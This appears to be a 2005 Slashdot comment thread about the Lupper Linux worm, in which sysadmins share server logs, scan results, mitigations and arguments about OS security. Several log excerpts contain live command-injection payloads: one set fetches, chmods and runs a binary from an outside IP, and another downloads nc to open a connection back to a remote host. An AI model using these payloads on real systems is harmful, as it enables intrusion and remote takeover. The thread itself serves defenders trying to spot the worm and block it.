Looks like this guy has already been infected: tail error_log [client 211.214.161.159] script '/var/www/html/xmlrpc.php' not found or unable to stat [Tue Nov 08 11:42:41 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blog [Tue Nov 08 11:42:42 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blog [Tue Nov 08 11:42:44 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blogs [Tue Nov 08 11:42:45 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/drupal [Tue Nov 08 11:42:46 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/phpgroupware [Tue Nov 08 11:42:47 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/wordpress [client 211.214.161.159] script '/var/www/html/xmlrpc.php' not found or unable to stat [Tue Nov 08 11:42:50 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/xmlrpc [Tue Nov 08 11:42:51 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/xmlsrv

O RLY?

[seanvaandering]

4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)

Sweet! Do you get that girl on the front page after signing up for a year prepaid?

Post 10 of those IP addresses.

[khasim]

I'm not seeing anything on my logs.

Why don't you post 10 of those "large number of IP addresses" so substantiate your claim?

Re:Post 10 of those IP addresses.

I'm not seeing anything on my logs.

I don't see anything on your logs either.

Re:Post 10 of those IP addresses.

[harlows_monkeys]

192.50.74.27
195.200.183.229
200.218.224.224
202.123.223.148
210.109.194.231
211.155.246.38
211.174.185.73
211.21.77.62
213.16.96.204
213.202.216.156.euhost.net
218.189.216.181
220-130-208-19.hinet-ip.hinet.net
220-244-34-242-wa.tpgi.com.au
61-218-77-13.hinet-ip.hinet.net
61.80.72.99
69.61.63.10
adsl-220-228-117-138.nh.sparqnet.net
adsl-68-122-36-243.dsl.pltn13.pacbell.net
aqr46.internetdsl.tpnet.pl
bbned99-214-100.dsl.hccnet.nl
bgp01132775bgs.ypeast01.mi.comcast.net
cho94-2-82-66-144-107.fbx.proxad.net
cpe002078111062-cm0011ae92b516.cpe.net.cable.roger s.com
delhi-203.200.79-133.vsnl.net.in
dsi-net.handicap.dk
ev1s-66-98-214-41.ev1servers.net
h-213.61.102.218.host.de.colt.net
hist.ih.univ.szczecin.pl
i02m-62-34-165-67.d4.club-internet.fr
noname.tim.se
ool-18bfd460.dyn.optonline.net
p15180695.pureserver.info
republicorp001.intellicentre.net.au
unknown.sagonet.net
www.zalau.info
xboat.cviog.uga.edu

Re:Post 10 of those IP addresses.

[jack_csk]

Those worm http scan are nothing comparing to some of those stupid ssh brute force attempts showing up in my log, just to show you a few lines of it:
==============
Oct 30 09:18:19 bsd sshd[76757]: Illegal user a from 61.135.145.252
Oct 30 09:18:24 bsd sshd[76759]: Illegal user b from 61.135.145.252
Oct 30 09:18:29 bsd sshd[76761]: Illegal user c from 61.135.145.252
Oct 30 09:18:35 bsd sshd[76763]: Illegal user d from 61.135.145.252
Oct 30 09:18:40 bsd sshd[76765]: Illegal user e from 61.135.145.252
Oct 30 09:18:47 bsd sshd[76767]: Illegal user f from 61.135.145.252
Oct 30 09:18:52 bsd sshd[76769]: Illegal user g from 61.135.145.252
Oct 30 09:19:01 bsd sshd[76771]: Illegal user h from 61.135.145.252
Oct 30 09:19:07 bsd sshd[76773]: Illegal user i from 61.135.145.252
==============
I am wondering what the hell that brute-force guy was thinking - those usernames usually would not mean anything, and they just simply trigger alarms

gah!

Web SERVER. Server! Not browser!

Hmm...

"McAfee reports that a Linux worm has been found in the wild"

Gotta catch em all.

Another Annoying Thing...

[u16084]

Why bother Hiding the source IP? cho$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62. 101.193.244| HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:29 -0500] "GET /scgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`e cho$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$I FS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\" `62.101.193.244| HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:30 -0500] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`6 2.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS \"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:31 -0500] "GET /cgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS \"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\" $IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.2 44| HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:32 -0500] "GET /scgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IF S\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\ "$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193. 244| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:33 -0500] "GET /cgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\" $IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$I FS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.1 93.244| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:35 -0500] "GET /scgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\ "$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$ IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101. 193.244| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:36 -0500] "GET /hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$I FS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS \"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193 .244| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:37 -0500] "GET /cgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo $IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS` echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62 .101.193.244| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:38 -0500] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`ech o$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS `echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`6 2.101.193.244| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:39 -0500] "GET /webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\ "$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$ IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101. 193.244| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:40 -0500] "GET /cgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`e cho$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$I FS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\" `62.

Re:Another Annoying Thing...

[u16084]

tailing the log, looks like a dozen or so IP's are attempting the same routine... So "In The Wild" means pretty well active...

Been in the wild since Feb.

[statemachine]

Or is this a different worm that exploits awstats?

First scan at my webserver:

xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Second scan:
xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET //cgi/awstats.pl?configdir=|
%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:

xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET /cgi-bin/awstats.pl?configdir
=%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.ro %2fnc%3bchmod%20%2bx%20nc%3b.%
2fnc%20something4u.propagation.net%2065000%20%7c%2 0 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

Huh?

[eno2001]

According to the linked site, you are vulnerable if you are running PHP (version?) and have a /{website dir}/cgi-bin directory. I guess that means anyone runnign PHP is vulnerable?

Apples to Oranges

[clickster]

I would like to point out a significant detail. It is far easier to deflect blame away from Linux than it is from Windows because, unlike Windows, Linux doesn't "automatically install" anything. Linux is just a kernel. A linux distro is just a Linux kernel with hundreds of "3rd party apps" tacked on. I'm not knocking Linux at all. I love Linux. But it's not a fair comparison when you're playing the "installed by default" game. The Linux kernel is 100% secure because it can't do anything by itself.

You should read the other replies before posting

[Roadkills-R-Us]

Several people have noted that this only affects systems that allow a CGI or PHP script to execute arbitrary programs. I don't think most Windows systems have that short of "shell" access from CGI/PHP. Then again, I know ALAP about Windows...

OS X and noexec

Just like you would any other directory on any other Unix: pass "noexec" as a flag to the mount command that creates the tmp directory (http://www.netadmintools.com/html/8mount.man.html ):

mount -o remount,noexec /tmp

Re:OS X and noexec

[punka]

The problem with Mac OS X (Darwin) is that /tmp is not its own filesystem:

# ls -l /
lrwxr-xr-x 1 root admin 11 Apr 25 2005 tmp@ -> private/tmp

It is just a dir that gets blown away every reboot from some commands in /etc/rc

Furthermore, if one were to try and use a RAM disk (man hdid), you can only create ones with a static # of sectors. In other words, Mac OS X has nothing like tmpfs.

Hahaha, stupid windows users...

Glad I'm running li-- wait, what?

IE 5?

[noisymime]

why... That's not MS sharing the IE love, its them trying to open up Macs to virus', those dirty scoundrels!

nmap results

[khasim]

192.50.74.27
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:49 PST
All 1663 scanned ports on 192.50.74.27 are: filtered

Nmap finished: 1 IP address (1 host up) scanned in 38.322 seconds

========

195.200.183.229
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:51 PST
Interesting ports on 195.200.183.229:
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap finished: 1 IP address (1 host up) scanned in 62.432 seconds

========

200.218.224.224
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:53 PST
All 1663 scanned ports on 200.218.224.224 are: filtered

Nmap finished: 1 IP address (1 host up) scanned in 39.839 seconds

========

202.123.223.148
I killed the process after 2 minutes.

========

210.109.194.231
I killed this one too.

========

211.155.246.38
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 10:01 PST
All 1663 scanned ports on 211.155.246.38 are: filtered

Nmap finished: 1 IP address (1 host up) scanned in 38.386 seconds

========

Okay, I'm stopping there. I was under the impression that I'd be seeing some open ports. I can only verify port 80 on ONE of those so far.

How OLD are those entries? Why does it appear that the problem, if it ever existed on those machines, has been cleared already?

I do an http redirect back to the source

[Dr.+Manhattan]

Most of these kinds of worms look for Windows files, but a few look for "awstats" and similar. I have a simple CGI that does an http redirect back to the originating machine.

Now, I don't think most worms really process such errors but it makes me feel better than just ignoring them, and it seems to be far more legal than either redirecting them to fbi.gov or launching some kind of counterattack.

Your sig

You need to escape those #s, too.

Shhhhhhh!

[Shadez666]

Don't tell the windows people that linux has security holes, they may decide it's payback time!

Security Focus is best...

[reclusivemonkey]

"A new Linux worm is crawling the web looking for a large number of vulnerable PHP systems and applications."

Good luck buddy, I don't think you're gonna find 'em...

sysadmins: known holes will be the next worms !

[free2]

What every sysadmin should know is that the unpatched known holes of today are not only open doors for crackers, they are the open doors for the next worms.
Every sysadmin should check security sites like Secunia, with a list of unpatched known holes for each software they use:
http://secunia.com/

Make all the claims you want.

[khasim]

Anybody can make a ridiculous metaphor that makes something TOTALLY unrelated look accurate.

It is not "TOTALLY unrelated". It illustrates how security is not affected by popularity. It shows that your position is incorrect.

Banks aren't particularly secure, they simple require a different risk.

Thanks for playing! It's been fun!

If you ever visit Reality, drop in and we'll have a beer.

I can walk into a bank with a gun and steal money.

I think I saw that movie, too. It was pretty good. Too bad it was so Hollywood and unrealistic.

Now, depending upon how ruthless I wish to be, I could very likely get away with it (you'd be shocked how often banks are robbed successfully (in the short term.)

Really? I would be? Let's see.
http://www.fbi.gov/ucr/cius_02/pdf/02crime2.pdf
So, the FBI records 402,637 "robberies". Of which, 2.3% are bank robberies.

So, all other robberies account for 97.7% of the total. But banks account for only 2.3% (or about 9,261 bank robberies).

But you think that "banks aren't particularly secure"?

The bank isn't more secure, the repercussions are more severe.

Strange. I mean, since murder would normally be seen as having "repercussions" that are "more severe" and all. But the FBI records 16,204 murders.

Yet more murders than bank robberies.

This is what makes your analogy terrible.

Nope. The analogy is solid.

It's just that the facts seem to contradict your position.

Anyway, if you're ever in the neighborhood of Reality, stop in for a beer.

Re:Make all the claims you want.

[Assmasher]

Whatever makes you feel better. Nice 'solid' analogy, LOL.

Re:Make all the claims you want.

[falconx7]

Your analogy wasn't all that great, and definately is not solid. So more people visit an individual bank than an individual house. However, there is a LOT more houses than banks. In a given period of time a lot more people visit any house than any bank. And looking at those stastics, yes residences are robbed more frequently than a bank.

Looking at that same data, banks still get robbed a decent ammount despite there being a lot less of them than houses. This is probably because the reward is much greater. All that cash in one place gives a greater reward, and hence more people go for it. Having better security decreases how many people are willing to go for it, or are succesful, but it still happens.

In the most basic terms it's based on difficulty, reward, and risk. In the case of worms, the larger the set of possible vulnerable machines the greater the reward. If linux really is more difficult it helps, but as the reward gets bigger there's more incentive.

So please, stop trying to ignore variables in the equation. Reward is most definately part of it. If someone is trying to expand a botnet, then a greater number of pc's to infect is most definately an incentive. As such an incentive grows, of course more people are going to attempt it. Sure, better security raises the difficulty and can help decrease this, but it definately isn't the only part of the equation.

not a good practice..

Unless you have tripwire or some off-disk checksums of your hard drive, you have no choice but to wipe and re-install configs and data from backups. If you haven't designed your systems to make this easy (keep all configs in /etc, /usr/local/etc, keep all customer data in one dir, etc), you're just making extra work for yourself OR making excuses why you shouldn't clean up a pwned machine.

Sure, 99% of the time, script kiddies are easy to clean up after. You might run into that 1% that make themselves root with an unpublished exploit, and install a kernel mod to hide themselves, and you think "oh, it's just some kiddies littering /tmp, big deal".

That's happened to me exactly once in my 10+ year career, but once was too much!

Salting the mine?

[Jerry]

http://isc.sans.org/diary.php?storyid=823
Here are the reported numbers:

Date Sources Targets Records tcp %
2005-11-07 5 5 11 100
2005-11-06 24 5 363 4
2005-11-05 27 4 2581 0
2005-11-04 35 8 5848 0
2005-11-03 111 8 22525 0
2005-11-02 6 7 10 100
2005-11-01 10 9 34 100
2005-10-31 6 7 33 100
2005-10-30 7 6 15 100

"Sources" is a count of infected PCs, i.e., unique IP addresses "originating traffic".
"Targets" are the PCs "receiving traffic".
"Records" is the number of PACKETS observed.

What is odd is that while there are supposedly 111 PCs that are infected and sending out hack attempts, those 111 PCs seem to target ONLY 8 PCs, and the total PACKET transmitted/recieved on 11/03 was only 22K. Very strange. Very LOW numbers and with a VERY LIMITED number of boxes.

Notice that the majority of "infections" are occuring on Nov 3, 4 and 5, and the reports from THREE anti-virus houses are on the 4th and 5th, the same day as the big spike in the "infection":
A scan from VirusTotal detects "cback" as:
Antivirus Version Update Result
Fortinet 2.48.0.0 11.04.2005 Linux/Rev.B-bdr
Kaspersky 4.0.2.24 11.05.2005 Backdoor.Linux.Small.al
McAfee 4620 11.04.2005 Linux/BackDoor-Rev.b

For such an infintesimally small number of supposedly hacked boxes these three anti-Virus houses already have dection software which can see the "trojan". That is REALLY FAST dection code writing, deployment and reporting for such a SMALL number of boxes.

Has someone salted the Linux anti-virus mine to hype business?

mod_security ruleset for WordPress blogs

[scaturan]

if you're using mod_security on Apache/UNIX platforms, you can set this globally.

SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "deny,,status:412"

and only enable for VirtualHost blocks that needs it. be sure to patch your stuff! :)

SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "allow,log," you can also enable Apache's SetEnvIf & conditional logging to pipe all xmlrpc.php requests to a centralized log file for analysis.

Kicked your ass.

[khasim]

I've often noted that when faced with facts, the loser will make some braggart statement instead of attempting to present facts of his own.

And you're another example of that.

I've posted links and facts. You only have your claims based upon your complete lack of understanding of security. Buh bye!

Re:Kicked your ass.

[Assmasher]

All you've proven is that you're 12 years old and terrible at analogies. Links and facts, PMSL. You supplied a link to a FBI statistic about crime rates. That really proves that your analogy is valid. Hehe.

Re:Kicked your ass.

Agreed. Stupid analogy. Especially if taken as a percentage, then I'd imagine banks are robbed far more often than homes.

Here's a cluestick for you

[freeweed]

It's called using the vernacular.

In a conversation like this, the obvious meaning of the word "Linux" is a fully functioning GNU/Linux distribution, consisting of the major components: the Linux kernel itself, everything related to GNU (apps, glibc, etc), and various 3rd party components as chosen by the distibution maintainer.

More help here.

Re:Here's a cluestick for you

[clickster]

Did you just offer me a cluestick while simply rewording what I said? You didn't even address the point of my post. I am returning your stick "postage due"

They are just now discovering this???

[Christianfreak]

I've been seeing requests for some of these URLs for 6 months now. I figured it was a worm but I know I'm patched and I don't run any of that stuff anyway. Amazing to me that people get owned by this sort of thing.

Between this and the SSH worm, maybe its time to investigate using Windows ME with Personal Web Server. :-D

LAME

[porkThreeWays]

going to members.lycos.co.uk/sugi brings up some other files that look like they are phishers too. I think rather than immediatly shut them down, it would be more effective to set up a sting. Lycos could retrieve the last ip address to log into that account. If it wasn't a compromised machine, they could contact the isp. When the next login is attempted, they could have the isp locate which customer it is, and bust down their door.

It's really sad that the AV companies haven't tried to shut the site down via contacting Lycos. It really shows me their commitment to security for the sake of security.

"Secure" vs "Safe"

[argent]

PHP is neither secure nor insecure. Individual applications are secure or insecure. PHP allows insecure applications and doesn't particularly encourage secure applications, nor does it limit the capabilities of secure applications.

There are application environments that are inherently safe... that is, they implement a sandbox that fails closed. Individual applications may be insecure, but if the application's security fails the attacker does not gain any capabilities that can be used to launch further attacks on other systems or other users on the same system.

Because it eats my bandwidth $

Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?

When comcast raised the bandwidth cap on my cable segment, my effective bandwidth decreased due to the increased number of attacks my neighbors' infected machines were able to pump out.

The worst part is that most of them know they are infected, but they choose not to do anything about it because it's easier to put up with a slow machine (their infected sooper-dooper boxes, which they only use for email and WildTanget, are slow as a 16 MHz 386) than to learn enough about the problem to fix it.

Since Comcast is too greedy and incompetent to block the customer ports that are clearly spewing virii and worms in all directions (they won't even shut down a human-guided attack unless I call them multiple times) the situation can do nothing but get worse.

Re:Because it eats my bandwidth $

[Taevin]

I have to agree with this. While I've never been exceptionally pleased with Comcast's service or support, it's been decent at least. Lately, however, my connection quality has been terrible. First off, I'm not even getting anywhere near the bandwidth I'm supposed to be getting (less than half). More frustrating however, is the fact that a significant portion of my packets seemingly disappear and it seems to come in waves. My connection will run fine for a few minutes and then all (or nearly all) of my traffic is lost for several seconds. Which effectively causes a disconnect in any online game, ssh sessions to be dropped, and file downloads/uploads to be choked up - frustrating to say the least. I did some speed tests just a little while ago:
(All numbers in kbps):
down / up
487 / 354
405 / 357
136 / 354
2601 / 356
3175 / 323
2665 / 362

The first three low numbers were so low because the speed test client was just sitting there waiting for packets to come in (apparently this was one of the trouble times). Not only that but, unless I'm mistaken, my connection is supposed to be 7Mbps (8? they like to claim they've upped their speeds so often it's hard to know) down and 768kbps up. Not even my best speed test is greater than half my supposed bandwidth. Anyone else with Comcast having problems like this? Given Comcast's competence level in the past it doesn't surprise me all the much, I'm just pissed that they're basically the only deal in town... too bad a T1 is too expensive for me at the moment.

Why Linux Sucks

[RomulusNR]

Yes the title is a troll. No, the point is not.

Linux (and open source in general) is always touted as better than closed-source because there is such a large community of geeks who know the stuff well, so anyone looking for information can tap into the community of geeks to get answers, instead of calling an idiot tech rep for $$/hour.

Except that communities of geeks are notoriously unapproachable, and their willingness to part with their geekily gained information is low. If the responses to this Slashdot article are any indication, geeks are more interested in belittling others (including other geeks) than actually providing useful information.

Albeit the geekish hordes of /. are somewhat (though not much) more helpful than McAfee's removal instructions, which are to upgrade my version of a Windows virus checker. But SD really does not have a better answer for the concerned admin on what he should be looking for to ensure his system is safe.

BTW, Wordpress 1.5 is safe.

No.

[khasim]

Jeez, all of you guys have a problem with shades of gray. It is neither 100% popularity nor 0% popularity.

No. You don't understand security.

Security is independant of popularity.

There is nothing about popularity that makes a system more or less secure.

It is a cost/benefit ratio.

No.

According to your logic 0 banks would be robbed since they have better security.

No. FEWER banks are robbed because they have BETTER security.

In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.

Yet banks get robbed. Why?

Because their security is not perfect.

Because there exists someone for whom the extra money outweighs the extra risk.

Now you're confusing "risk" with "security".

The two are not the same.

Security != Popularity
Security != Risk

Eventually we will reach a point where the target size will be large enough that it provides enough bang/buck to defeat the extra security.

Read "Attack Trees" by Bruce Schneier.

http://www.schneier.com/paper-attacktrees-ddj-ft.h tml

Security is all about reducing the avenues of attack.

If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.

Can't measure OS security by worm prevalence.

[Bob.Kerns]

Re: The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.

It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...

If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.

If X is rare, few felons will have the expertise to attack it.

If X is rare, few felons will have the motivation to attack it.

Conversely, if X is widespread, and hated among felons, it will be an attractive target.

If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.

The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quicly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.

So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.

Sorry -- it would be nice if the world were so simple.

Re:Can't measure OS security by worm prevalence.

Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...

Linux is already much more widely deployed for web servers. Hence his point...

Lupper has a variant now - ELF_LUPPER.B

[jjMick]

Internet Storm Center has information about new variant reported by TrendMicro:
http://isc.sans.org/diary.php?storyid=829

and the description itself is at http://www.trendmicro.com/vinfo/virusencyclo/defau lt5.asp?VName=ELF_LUPPER.B&VSect=P

That's cool...

[mikehunt]

my ISP blocks port 80 incoming....:-(

(Keeps my firewall logs short at least.)

IE is not cross-platform

[macdaddy]

Microsoft hasn't released an updated for IE on OS X since 6/16/2003. They only released that small upgrade from 5.2.1 because of an asinine amount of bugs in 5.2.1, including one that I found and reported. They made a big todo over 5.2.1 being their last Mac release. 2.5 years is more than long enough to consider that IE is no longer available as a Mac product. You can still pick up a Redhat release that supports Sparc (5.x). Does that mean that RH supports Sparcs? No, it doesn't.

not on my watch

[ali3nxx]

p4k1tst0rm ~ # uname -a
Linux p4k1tst0rm 2.6.13-hardened #1 SMP Tue Sep 20 21:24:24 CDT 2005 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
p4k1tst0rm ~ # cat /etc/gentoo-release
Gentoo Base System version 1.6.13

Bring it on =]

Recognition

[foxhound01]

This just goes to show that people are recognizing Linux enough to be willing to write viruses for it.

Of course

[NanoGator]

I think the developers who left these vulnerabilities open should be financially responsible for the damage this may cause.

log analysis

[ilf]

i was scanned from 216.128.227.73 (19 hits) and 24.42.129.18 (14 hits).
first tries a wget fron 195.224.174.18/nikon, 2. one from 24.224.174.18/listen
both are down.

a third tries to get 62.101.193.244/lupii from 64.246.0.38, but it's down, too.

"listen" is also tried from 24.224.2.174/listen

more info on it here: http://isc.sans.org/diary.php?storyid=823

If if if if if...

[Max+Threshold]

Still a lot better than, "If you're running Windows you're fucked."

AWSTATS

[kimvette]

I notice that one of the listed vulnerabilities in awstats - definitely the fault of the administrator because not only is there a patched awstats version to address this well-documented vulnerability (check the project page at sourceforge), but you should also NOT make awstats publicly available. Lock it down so it can be accessed either only from your local/LAN IP range, or at least use http authentication (read up on .htaccess, man htpasswd/htpasswd2).

If you don't understand how to do either, I wouldn't say that you shouldn't be allowed near computers (everyone has to start from somewhere) but I will tell you that you need to RTFM. Yesterday.

Chances are that if you don't have the vulnerable apps locked down or patched already, you've already been rooted. Download/install rkhunter and chkrootkit and run them, keep them updated, set them up on cron jobs (man crontab), and actually read the reports daily - or at least the summaries.

Re:AWSTATS

[kimvette]

Oh, and yes I know this is feeding the trolls, but:

These are administrative bungles and NOT security holes inherent to Unix/Linux/*nix. If you RTFA you will notice that not only is *nix affected, but every other platform (e.g., Windows) due to vulnerabilities in the application (perl, php), so let's not continue the platform wars, mmmmkay?

that's a variant of worm!

That's a more deadly variant of the worm! (standard version cited in comment 13978670)

• It has different filenames
• It tries to empty /tmp and kill all perl processes
• It runs the downloaded program through an interpreter (thus mounting /tmp with the noexec option does nothing).